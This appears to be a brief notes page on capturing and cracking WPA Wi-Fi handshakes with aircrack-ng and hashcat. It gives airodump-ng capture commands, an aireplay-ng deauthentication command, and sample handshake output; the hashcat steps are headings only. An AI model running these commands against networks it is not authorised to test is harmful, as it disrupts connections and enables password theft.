Aircrack
Install
pacman -S aircrack-ngpacman -S hashcat hashcat-utilsUsage
Capture traffic
airodump-ng wlan0 -w pskairodump-ng wlan0 -w psk --bssid AA:BB:CC:DD:EE:FF -c 11Perform deauth
aireplay-ng -0 15 -a AA:BB:CC:DD:EE:FF -c FF:EE:DD:CC:BB:AA wlan0Check if a handshake has been captured
aircrack-ng psk*.cap
Reading packets, please wait...
Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 19266 packets.
# BSSID ESSID Encryption
1 AA:BB:CC:DD:EE:FF Target-XXXX WPA (1 handshake)
2 AA:BB:CC:DD:EE:FA Target-YYYY WPA (0 handshake)Convert to hashcat format
Attack with hashcat
Last updated